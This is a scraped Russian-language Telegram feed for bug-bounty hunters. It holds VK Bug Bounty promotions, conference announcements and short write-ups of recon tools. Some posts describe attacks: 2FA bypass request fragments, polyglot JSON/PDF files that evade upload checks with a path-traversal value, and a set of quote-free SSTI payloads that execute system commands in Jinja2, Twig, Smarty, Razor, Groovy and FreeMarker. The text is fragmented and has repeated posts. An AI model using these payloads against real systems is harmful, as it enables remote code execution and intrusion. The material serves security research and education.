Почему багхантеры используют именно эту ОС для работы? Причины у каждого свои, но вот, кажется, основные:
bash
, Python
, cron
и другие инструменты, которые упрощают жизнь.#шпаргалки
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Об XSS с мутациями (mutation-based XSS или mXSS) в сообществе багхантеров известно уже давно, но так ли часто вам удается их найти в реальных багбаунти-программах? С Dom-Explorer точно удастся.
mXSS использует код, который воспринимается HTML-санитайзерами как безопасный, а после прохождения очистки мутирует во вредоносный. В этом и состоит парадоксальность и опасность этого типа XSS атак.
Dom-Explorer как раз полезен для обнаружения и поиска mXSS. Он демонстрирует, как популярные средства парсинга HTML реагируют на любую заданную HTML-строку, чтобы помочь вам выявить непредвиденное поведение, которое может открыть новые перспективные области для исследований.
Главная фича — скорость тестирования новых идей и мгновенное отображение результатов. Инструмент, на который он больше всего похож, — это Live DOM Viewer с более скудными возможностями. А вдохновлялся автор всем известным Cyberchef.
До появления Dom-Explorer проведение такого рода исследований занимало гораздо больше времени — «особенно если вы тестируете глубоко вложенные элементы» — и включало гораздо больше этапов, говорит разработчик инструмента. Иногда это было практически «невозможно сделать с помощью классических инструментов».
#инструменты
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from VK Security
Спойлерим программу конференции VK Security Confab Max
💥 Опубликовали на сайте программу нашей конференции VK Security Confab Max 11 декабря
Что нас ждет? Как и обещали – лютый хардкор!
🤘 Нон-стоп!
Два трека с техническими докладами от ведущих экспертов VK и крупнейших BigTech-компаний.
Ключевые темы:
⭐️ Работа SOC в BigTech: управление алертами и потоком событий, требования к SIEM, а также обнаружение атак.
🛡 Защита инфраструктуры: Service Mesh, эволюция сканирования распределенной инфраструктуры и обнаружение открытых портов.
🎮 Уязвимости: Построение Vulnerability Management в современных реалиях, эксплуатация уязвимостей SSRF и mXSS и защита от них.
🔍 Bug Bounty: концепция Bug Bounty 2.0, защищенность соцсетей и серьезные уязвимости в системах, которые можно обнаружить не только багхантерам.
⚙️ Безопасность приложений (AppSec): безопасность API c применением ML и AI, поиск и приоритизация уязвимостей в зависимостях, разбор популярных сканеров и их недостатков.
💭 Защита облачных технологий: харденинг k8s, защита от атак в публичном облаке, а также техническое устройство сетевой изоляции в облаке.
📍 Москва, офис VK + трансляция онлайн
📅 11 декабря 2024 года
Участие бесплатное, но мест мало
👉 жмите, чтобы зарегистрироваться и узнать программу
➡️ Подписывайтесь на канал VK Security, чтобы не пропустить новости о мероприятии
#confab #max #конференция
Что нас ждет? Как и обещали – лютый хардкор!
Два трека с техническими докладами от ведущих экспертов VK и крупнейших BigTech-компаний.
Ключевые темы:
Участие бесплатное, но мест мало
👉 жмите, чтобы зарегистрироваться и узнать программу
#confab #max #конференция
Please open Telegram to view this post
VIEW IN TELEGRAM
Но когда в реализацию вносятся дополнительные изменения или когда игнорируются передовые практики безопасности, могут возникнуть всевозможные баги 2FA, которые создают предпосылки для обхода любой обязательной многофакторной аутентификации.
Разберем несколько простых способов обхода 2FA и не только:
POST /api/auth/2fa/verify HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
User-Agent: ...
GET /api/ HTTP/1.1
Host: api-prod. internal: 3001
X-User-Id: 84556
#этобаза
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Видеоканал Global Digital Space
Рынок уязвимостей | пентесты и BAS-технологии | Эпизод 6
Как изменился мир пентестов, и почему Breach and Attack Simulation (BAS) становится трендом? 🤔
Что обсудили:
⚫️ Топовые инструменты: Burp Suite, Cobalt Strike, Sliver – что выбирают пентестеры?
⚫️ BAS-технологии: заменят ли они классические пентесты?
🎙Наши эксперты:
Модератор: Лука Сафонов, Киберполигон
Спикеры:
⚫️ Дмитрий Курамин, Инфосистемы Джет
⚫️ Анатолий Песковский, Информзащита
⚫️ Сергей Куприн, CtrlHack
📱 VK | 📺 RUTUBE | 📺 YouTube |
🖤 Смотрите подкаст, ставьте лайки и делитесь своим мнением.
Как изменился мир пентестов, и почему Breach and Attack Simulation (BAS) становится трендом? 🤔
Что обсудили:
🎙Наши эксперты:
Модератор: Лука Сафонов, Киберполигон
Спикеры:
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from VK Security
Bounty pass#3: Advent — на финишной прямой
19 декабря закончится наш предновогодний багхантерский марафон и завершим Bounty pass#3: Advent мы шумной вечеринкой BB Advent Party.🕺
А пока смотрите, что скрывало последнее окошко в нашем адвент-календаре для багхантеров — промокод на 150 000 рублей!😲
🏃 Есть еще сегодня, выходные и 4 суток, чтобы собрать все подарки адвента! Го сдавать ваши отчеты в программы VK Bug Bounty на платформах Standoff, BI.ZONE Bug Bounty и Bugbounty.ru!
@VK Security
#bugbounty #bountypass #advent
19 декабря закончится наш предновогодний багхантерский марафон и завершим Bounty pass#3: Advent мы шумной вечеринкой BB Advent Party.
А пока смотрите, что скрывало последнее окошко в нашем адвент-календаре для багхантеров — промокод на 150 000 рублей!
@VK Security
#bugbounty #bountypass #advent
Please open Telegram to view this post
VIEW IN TELEGRAM
Хантеры, готовы к новогоднему подгону от VK?
Область поиска: веб-ресурсы и мобильные платформы Android и iOS, и TV.
Двухуровневый скоуп:
vkvideo.ru, m.vkvideo.ru, api.vkvideo.ru — до 2,4 млн
live.vkvideo.ru — до 1,2 млн
Время открывать баги и зарабатывать по-крупному!
Программа уже тут.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from VK Security
Media is too big
VIEW IN TELEGRAM
Не смогли попрощаться с Bounty pass в 2024 году, поэтому теперь Bounty pass – навсегда! 🔥
Мы ярко провели юбилейный для VK Bug Bounty год: запустили программу лояльности для багхантеров, отменили лимиты на максимальные выплаты благодаря накопительному бонусу, провели серию специальных ивентов... И поняли, что не время прощаться!
С этого дня мы запускаем Bounty pass: Forever!🎉
Что будет?
🛍 Накопительный бонус по уровню критичности: до +5% к каждому следующему вознаграждению. ☝️Запоминаем: чем больше находишь критических уязвимостей – тем больше бонус!
🗓 Срок действия бонуса – 1 год с момента сдачи отчета
➕ Все бонусы суммируются
🏆 Все участники Bounty pass в 2024 году получают 5% к каждому оплачиваемому отчету до конца 2025 года. А если багхантер отправил за год более 10 оплачиваемых отчетов или заработал более 1 миллиона рублей, то он получает на старте сразу 10%.
🎁 Мерч (как же без него 😏 ):
каждый квартал будем дарить крутой мерч всем багхантерам, которые сдадут 4+ оплачиваемых отчета или получат вознаграждение больше 400 000 рублей.
👉 Все детали новых условий собрали на новом сайте
Ждем ваши новые отчеты в программе VK Bug Bounty на платформах Standoff, BI.ZONE Bug Bounty и Bugbounty.ru!
@VK Security
#bugbounty #bountypass #forever
Мы ярко провели юбилейный для VK Bug Bounty год: запустили программу лояльности для багхантеров, отменили лимиты на максимальные выплаты благодаря накопительному бонусу, провели серию специальных ивентов... И поняли, что не время прощаться!
С этого дня мы запускаем Bounty pass: Forever!
Что будет?
каждый квартал будем дарить крутой мерч всем багхантерам, которые сдадут 4+ оплачиваемых отчета или получат вознаграждение больше 400 000 рублей.
Ждем ваши новые отчеты в программе VK Bug Bounty на платформах Standoff, BI.ZONE Bug Bounty и Bugbounty.ru!
@VK Security
#bugbounty #bountypass #forever
Please open Telegram to view this post
VIEW IN TELEGRAM
🔍 Мониторинг JavaScript-файлов для поиска уязвимостей
В ходе разведки багхантеры обычно начинают с изучения скрытых активов, директорий, файлов и эндпоинтов. Однако они часто упускают из виду интересную информацию, которая загружается по умолчанию, — JavaScript-файлы.
Если мониторить изменения в JavaScript-файлах в режиме реального времени, можно обнаружить новые функции или изменения в существующих, которые потенциально могут быть уязвимыми. Также не стоит забывать про случайно опубликованные секреты, которые можно найти в коде.
Для тех, кто ценит автоматизацию, мониторинг JavaScript-файлов — это настоящий кладезь для изучения. Начните с JSMon — инструмента для мониторинга изменений в JavaScript-файлах. Этот инструмент позволяет отслеживать обновления файлов и анализировать их содержимое.
Для парсинга используется библиотека Tree-sitter, представляющая собой инструмент инкрементального парсинга. Она строит синтаксическое дерево исходного файла и эффективно обновляет его при редактировании. Это позволяет легко анализировать изменения в JavaScript-файлах.
Еще один полезный инструмент — jsluice. Это простой Go-пакет и CLI-инструмент для извлечения URL-адресов, путей, секретов и других ценных данных из исходного кода JavaScript.
Чтобы улучшить автоматизацию, jsluice можно использовать в связке с Notify от ProjectDiscovery. Этот инструмент транслирует выходные данные нескольких утилит (или считывает их из файла) и публикует уведомления на различных платформах, таких как Slack, Discord, Telegram и другие.
#инструменты
В ходе разведки багхантеры обычно начинают с изучения скрытых активов, директорий, файлов и эндпоинтов. Однако они часто упускают из виду интересную информацию, которая загружается по умолчанию, — JavaScript-файлы.
Если мониторить изменения в JavaScript-файлах в режиме реального времени, можно обнаружить новые функции или изменения в существующих, которые потенциально могут быть уязвимыми. Также не стоит забывать про случайно опубликованные секреты, которые можно найти в коде.
Для тех, кто ценит автоматизацию, мониторинг JavaScript-файлов — это настоящий кладезь для изучения. Начните с JSMon — инструмента для мониторинга изменений в JavaScript-файлах. Этот инструмент позволяет отслеживать обновления файлов и анализировать их содержимое.
Для парсинга используется библиотека Tree-sitter, представляющая собой инструмент инкрементального парсинга. Она строит синтаксическое дерево исходного файла и эффективно обновляет его при редактировании. Это позволяет легко анализировать изменения в JavaScript-файлах.
Еще один полезный инструмент — jsluice. Это простой Go-пакет и CLI-инструмент для извлечения URL-адресов, путей, секретов и других ценных данных из исходного кода JavaScript.
Чтобы улучшить автоматизацию, jsluice можно использовать в связке с Notify от ProjectDiscovery. Этот инструмент транслирует выходные данные нескольких утилит (или считывает их из файла) и публикует уведомления на различных платформах, таких как Slack, Discord, Telegram и другие.
#инструменты
Команда Doyensec поделилась исследованием, раскрывающим кейсы эксплуатации слабых мест проверок для выполнения сложных атак, включая CSPT, CSRF и XSS.
JSON — популярный формат передачи данных, который можно использовать для обхода проверок загрузки. Многие приложения проверяют загружаемые файлы, используя библиотеки и инструменты для проверки MIME-типа и структуры. Однако правильно сформированный JSON может пройти эти проверки и быть обработан на стороне клиента.
Исследование показывает, как создать файл, который будет распознаваться как PDF, но при этом оставаться валидным JSON для клиента:
•
mmmagic
(обычно используется в приложениях Node.js для определения типов файлов): достаточно поместить заголовок %PDF
в первые 1024 байта. •
pdflib
: Использование допустимой структуры PDF с минимальными корректировками (например, замена %0A
на %20
).file
Команда
file
ограничивает количество байтов для анализа. Это ограничение можно использовать, добавив в файл большое количество пробелов. Проверка файла завершится ошибкой, и файл классифицируется как PDF.Создание JSON-файла с магическими байтами
WEBP
в нужном месте позволяет пройти проверку формата изображения: {"aaa": "WEBP", "_id": "../../../../CSPT?"}
Что использовать:
• Создание файлов, которые валидны сразу для нескольких форматов.
• Анализ исходного кода библиотек проверки (например, mmmagic, pdflib, file-type).
• Эксплуатация технических ограничений, таких как лимиты чтения данных.
Где применимо:
• CSPT → обход путей на стороне клиента.
• CSRF → выполнение межсайтовых запросов.
• XSS → внедрение вредоносного JavaScript.
Please open Telegram to view this post
VIEW IN TELEGRAM
Любые функции, которые поддерживают расширенную пользовательскую разметку, могут быть уязвимы для SSTI, включая wiki-страницы, обзоры, маркетинговые приложения, CMS-системы и т. д.
По умолчанию многие шаблонизаторы имеют включенное автоматическое экранирование или выполняют экранирование HTML перед процессом рендеринга шаблона. Иногда это значительно усложняет сценарий эксплуатации из-за фильтрации кавычек, используемой для рендеринга строковых данных.
Без строковых данных в какой-либо форме RCE значительно сложнее достичь для некоторых шаблонизаторов, ярким примером которых является Twig. Однако для других эксплуатация остается относительно простой даже без использования кавычек.
Так почему бы не создать набор пэйлоадов для популярных шаблонизаторов с импактом RCE, которые используют только дефолтные функции и методы из шаблонизатора и не используют какие-либо кавычки или ресурсы, доступные за пределами самого шаблонизатора? Это гарантировало бы работу пэйлоада в максимально возможном количестве сценариев эксплуатации.
Разберем несколько примеров, а остальные читайте в исследовании багхантера из YesWeHack:
🟠 Jinja2 (Python) позволяет выполнять Python-код через глобальные переменные:
Получение строки
Выполнение команды
🟠 Twig (PHP) отличается сложностью из-за автоматического экранирования, но RCE возможна через функции
Эксплуатация через двойной рендеринг:
🟠 Smarty (PHP) использует функцию
Выполнение команды
🟠 Razor (ASP.NET) поддерживает выполнение C#-кода, позволяя напрямую запускать системные команды:
Генерация команды
Выполнение команды:
🟠 Groovy (Java) использует
🟠 FreeMarker (Java) преобразует числа в строки через
По умолчанию многие шаблонизаторы имеют включенное автоматическое экранирование или выполняют экранирование HTML перед процессом рендеринга шаблона. Иногда это значительно усложняет сценарий эксплуатации из-за фильтрации кавычек, используемой для рендеринга строковых данных.
Без строковых данных в какой-либо форме RCE значительно сложнее достичь для некоторых шаблонизаторов, ярким примером которых является Twig. Однако для других эксплуатация остается относительно простой даже без использования кавычек.
Так почему бы не создать набор пэйлоадов для популярных шаблонизаторов с импактом RCE, которые используют только дефолтные функции и методы из шаблонизатора и не используют какие-либо кавычки или ресурсы, доступные за пределами самого шаблонизатора? Это гарантировало бы работу пэйлоада в максимально возможном количестве сценариев эксплуатации.
Разберем несколько примеров, а остальные читайте в исследовании багхантера из YesWeHack:
Получение строки
id:
{{self.__init__.__globals__.__str__()[1786:1788]}}
Выполнение команды
id
с помощью os.popen:
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen(self.__init__.__globals__.__str__()[1786:1788]).read()}}
passthru:
Эксплуатация через двойной рендеринг:
{{id~passthru~_context|join|slice(2,2)|split(000)|map(_context|join|slice(5,8))}}
chr
для построения строк. Выполнение команды
id:
{{passthru(implode(Null,array_map(chr(99)|cat:chr(104)|cat:chr(114),[105,100])))}}
Генерация команды
whoami:
@{string x=null;int[]l={119,104,111,97,109,105};foreach(int c in l){x+=((char)c).ToString();};}@x
Выполнение команды:
@System.Diagnostics.Process.Start("cmd.exe", "whoami");
execute
для запуска полученной строковой команды как системной:${x=new String();for(i in[105,100]){x+=((char)i).toString()};x.execute().text}
lower_abc
, что позволяет создавать пэйлоад для выполнения команд:${(6?lower_abc+18?lower_abc+5?lower_abc+5?lower_abc+13?lower_abc+1?lower_abc+18?lower_abc+11?lower_abc+5?lower_abc+18?lower_abc+1.1?c[1]+20?lower_abc+5?lower_abc+13?lower_abc+16?lower_abc+12?lower_abc+1?lower_abc+20?lower_abc+5?lower_abc+1.1?c[1]+21?lower_abc+20?lower_abc+9?lower_abc+12?lower_abc+9?lower_abc+20?lower_abc+25?lower_abc+1.1?c[1]+5?upper_abc+24?lower_abc+5?lower_abc+3?lower_abc+21?lower_abc+20?lower_abc+5?lower_abc)?new()(9?lower_abc+4?lower_abc)}
Please open Telegram to view this post
VIEW IN TELEGRAM
📸 gowitness — простой Go-инструмент, который делает скриншоты, регистрирует HTTP-статусы и собирает сведения о сервере. Это делает его идеальным для разведки, когда у вас есть длинный список доменов для анализа.
Установка:
go install github.com/sensepost/gowitness@latest
Запуск:
gowitness scan single --url "https://example.com" --write-db
P. S. Можно скачать бинарь, если не хотите устанавливать gowitness .
⚒️ Похожие инструменты:
• EyeWitness
• WitnessMe
• Snapback
• Aquatone
Please open Telegram to view this post
VIEW IN TELEGRAM